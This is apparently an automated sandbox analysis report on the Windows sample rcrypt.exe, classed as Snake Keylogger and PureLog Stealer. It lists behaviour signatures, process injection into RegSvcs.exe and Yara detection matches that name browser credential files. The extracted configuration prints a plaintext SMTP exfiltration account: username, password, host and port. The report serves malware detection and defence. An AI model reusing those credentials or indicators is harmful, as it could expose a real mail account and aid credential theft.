Edit tour

Windows Analysis Report
rcrypt.exe

Overview

General Information

Sample name:	rcrypt.exe
Analysis ID:	1480061
MD5:	f91e3211d607a74a7635027718dd9701
SHA1:	cb9584d3ce55ab6191d79f841ab135404b733e6d
SHA256:	6e1995af5434855d121995cd5d5e2c6bcfd3bca269845b0579bc8e133784732d
Tags:	exe
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rcrypt.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\rcrypt.exe" MD5: F91E3211D607A74A7635027718DD9701)

RegSvcs.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\rcrypt.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "commercial@logosbd.net", "Password": "C#mal@919%", "Host": "mail.logosbd.net", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1319524168.00000000033B0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C9 88 44 24 2B 88 44 24 2F B0 96 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x801f8:$a1: get_encryptedPassword 0x801cc:$a2: get_encryptedUsername 0x80290:$a3: get_timePasswordChanged 0x801a8:$a4: get_passwordField 0x8020e:$a5: set_encryptedPassword 0x7ffdb:$a7: get_logins 0x7b643:$a10: KeyLoggerEventArgs 0x7b612:$a11: KeyLoggerEventArgsEventHandler 0x800af:$a13: _encryptedPassword
00000002.00000002.3769801925.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C9 88 44 24 2B 88 44 24 2F B0 96 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e8ba:$a1: get_encryptedPassword 0x3e88e:$a2: get_encryptedUsername 0x3e952:$a3: get_timePasswordChanged 0x3e86a:$a4: get_passwordField 0x3e8d0:$a5: set_encryptedPassword 0x3e69d:$a7: get_logins 0x39d05:$a10: KeyLoggerEventArgs 0x39cd4:$a11: KeyLoggerEventArgsEventHandler 0x3e771:$a13: _encryptedPassword
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49a00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x490a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49300:$a4: \Orbitum\User Data\Default\Login Data 0x49cdf:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c45b:$s1: UnHook 0x3c3f7:$s2: SetHook 0x3c430:$s3: CallNextHook 0x3c3bf:$s4: _hook
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f7a2:$a1: get_encryptedPassword 0x3f776:$a2: get_encryptedUsername 0x3f83a:$a3: get_timePasswordChanged 0x3f752:$a4: get_passwordField 0x3f7b8:$a5: set_encryptedPassword 0x3f585:$a7: get_logins 0x3abed:$a10: KeyLoggerEventArgs 0x3abbc:$a11: KeyLoggerEventArgsEventHandler 0x3f659:$a13: _encryptedPassword
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a8e8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f8b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a1e8:$a4: \Orbitum\User Data\Default\Login Data 0x4abc7:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d343:$s1: UnHook 0x3d2df:$s2: SetHook 0x3d318:$s3: CallNextHook 0x3d2a7:$s4: _hook
00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7692	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7692	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7692	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7692	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x400b8:$a1: get_encryptedPassword 0x116294:$a1: get_encryptedPassword 0x19901c:$a1: get_encryptedPassword 0x4008c:$a2: get_encryptedUsername 0x116268:$a2: get_encryptedUsername 0x198ff0:$a2: get_encryptedUsername 0x40150:$a3: get_timePasswordChanged 0x11632c:$a3: get_timePasswordChanged 0x1990b4:$a3: get_timePasswordChanged 0x40068:$a4: get_passwordField 0x116244:$a4: get_passwordField 0x198fcc:$a4: get_passwordField 0x400ce:$a5: set_encryptedPassword 0x1162aa:$a5: set_encryptedPassword 0x199032:$a5: set_encryptedPassword 0x3fea4:$a7: get_logins 0x116080:$a7: get_logins 0x198e08:$a7: get_logins 0x3c3c1:$a10: KeyLoggerEventArgs 0x112481:$a10: KeyLoggerEventArgs 0x195325:$a10: KeyLoggerEventArgs
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C9 88 44 24 2B 88 44 24 2F B0 96 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C9 88 44 24 2B 88 44 24 2F B0 96 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.rcrypt.exe.33b0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C9 88 44 24 2B 88 44 24 2F B0 96 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.2a79a56.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2a79a56.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2a79a56.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2a79a56.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2a79a56.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d9a2:$a1: get_encryptedPassword 0x3d976:$a2: get_encryptedUsername 0x3da3a:$a3: get_timePasswordChanged 0x3d952:$a4: get_passwordField 0x3d9b8:$a5: set_encryptedPassword 0x3d785:$a7: get_logins 0x38ded:$a10: KeyLoggerEventArgs 0x38dbc:$a11: KeyLoggerEventArgsEventHandler 0x3d859:$a13: _encryptedPassword
2.2.RegSvcs.exe.2a79a56.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48ae8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4818b:$a3: \Google\Chrome\User Data\Default\Login Data 0x483e8:$a4: \Orbitum\User Data\Default\Login Data 0x48dc7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2a79a56.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b543:$s1: UnHook 0x3b4df:$s2: SetHook 0x3b518:$s3: CallNextHook 0x3b4a7:$s4: _hook
2.2.RegSvcs.exe.2e60000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e60000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2e60000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e60000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e60000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3caba:$a1: get_encryptedPassword 0x3ca8e:$a2: get_encryptedUsername 0x3cb52:$a3: get_timePasswordChanged 0x3ca6a:$a4: get_passwordField 0x3cad0:$a5: set_encryptedPassword 0x3c89d:$a7: get_logins 0x37f05:$a10: KeyLoggerEventArgs 0x37ed4:$a11: KeyLoggerEventArgsEventHandler 0x3c971:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e60000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47c00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x472a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47500:$a4: \Orbitum\User Data\Default\Login Data 0x47edf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e60000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a65b:$s1: UnHook 0x3a5f7:$s2: SetHook 0x3a630:$s3: CallNextHook 0x3a5bf:$s4: _hook
2.2.RegSvcs.exe.2e60000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e60000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2e60000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2e60000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e60000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e60000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e8ba:$a1: get_encryptedPassword 0x3e88e:$a2: get_encryptedUsername 0x3e952:$a3: get_timePasswordChanged 0x3e86a:$a4: get_passwordField 0x3e8d0:$a5: set_encryptedPassword 0x3e69d:$a7: get_logins 0x39d05:$a10: KeyLoggerEventArgs 0x39cd4:$a11: KeyLoggerEventArgsEventHandler 0x3e771:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e60000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49a00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x490a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49300:$a4: \Orbitum\User Data\Default\Login Data 0x49cdf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e60000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c45b:$s1: UnHook 0x3c3f7:$s2: SetHook 0x3c430:$s3: CallNextHook 0x3c3bf:$s4: _hook
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f7a2:$a1: get_encryptedPassword 0x3f776:$a2: get_encryptedUsername 0x3f83a:$a3: get_timePasswordChanged 0x3f752:$a4: get_passwordField 0x3f7b8:$a5: set_encryptedPassword 0x3f585:$a7: get_logins 0x3abed:$a10: KeyLoggerEventArgs 0x3abbc:$a11: KeyLoggerEventArgsEventHandler 0x3f659:$a13: _encryptedPassword
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a8e8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f8b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a1e8:$a4: \Orbitum\User Data\Default\Login Data 0x4abc7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2a79a56.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d343:$s1: UnHook 0x3d2df:$s2: SetHook 0x3d318:$s3: CallNextHook 0x3d2a7:$s4: _hook
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e8ba:$a1: get_encryptedPassword 0x3e88e:$a2: get_encryptedUsername 0x3e952:$a3: get_timePasswordChanged 0x3e86a:$a4: get_passwordField 0x3e8d0:$a5: set_encryptedPassword 0x3e69d:$a7: get_logins 0x39d05:$a10: KeyLoggerEventArgs 0x39cd4:$a11: KeyLoggerEventArgsEventHandler 0x3e771:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49a00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x490a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49300:$a4: \Orbitum\User Data\Default\Login Data 0x49cdf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2b60ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c45b:$s1: UnHook 0x3c3f7:$s2: SetHook 0x3c430:$s3: CallNextHook 0x3c3bf:$s4: _hook
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e8ba:$a1: get_encryptedPassword 0x3e88e:$a2: get_encryptedUsername 0x3e952:$a3: get_timePasswordChanged 0x3e86a:$a4: get_passwordField 0x3e8d0:$a5: set_encryptedPassword 0x3e69d:$a7: get_logins 0x39d05:$a10: KeyLoggerEventArgs 0x39cd4:$a11: KeyLoggerEventArgsEventHandler 0x3e771:$a13: _encryptedPassword
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49a00:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x490a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49300:$a4: \Orbitum\User Data\Default\Login Data 0x49cdf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2a7a93e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c45b:$s1: UnHook 0x3c3f7:$s2: SetHook 0x3c430:$s3: CallNextHook 0x3c3bf:$s4: _hook
2.2.RegSvcs.exe.2b60000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b60000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2b60000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b60000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b60000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b60000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f7a2:$a1: get_encryptedPassword 0x3f776:$a2: get_encryptedUsername 0x3f83a:$a3: get_timePasswordChanged 0x3f752:$a4: get_passwordField 0x3f7b8:$a5: set_encryptedPassword 0x3f585:$a7: get_logins 0x3abed:$a10: KeyLoggerEventArgs 0x3abbc:$a11: KeyLoggerEventArgsEventHandler 0x3f659:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b60000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a8e8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f8b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a1e8:$a4: \Orbitum\User Data\Default\Login Data 0x4abc7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2b60000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d343:$s1: UnHook 0x3d2df:$s2: SetHook 0x3d318:$s3: CallNextHook 0x3d2a7:$s4: _hook
2.2.RegSvcs.exe.2b60ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b60ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
